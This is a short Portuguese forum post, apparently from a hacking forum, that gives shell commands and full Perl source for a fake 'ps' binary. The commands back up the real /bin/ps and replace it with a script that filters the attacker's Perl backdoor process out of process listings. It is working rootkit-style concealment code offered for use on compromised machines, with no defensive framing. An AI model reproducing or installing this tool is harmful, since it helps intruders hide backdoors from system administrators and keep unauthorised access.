posta ai pra gente
Versão Imprimível
posta ai pra gente
Copiamos o ps original para ps.old!
hacr#mv /bin/ps /bin/ps.old
Baixando e copiando o Fake PS!
hacr#fetch Your Page.com
hacr#mv ps.pl /bin/ps
hacr#chmod +x /bin/ps
Obs:Você tem que alterar o script de acordo com sua Backdoor!
No meu caso minhas backdoors são feitas em Perl ae o processo fica com o nome de (perl5.8.8).
Segue o codigo:
#!/usr/bin/perl
#Credits by [email protected]
use warnings;
use strict;
my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(perl5.8.8)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(perl5.8.8)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}
no meu blog tbm tem do netstat e to criando do socket!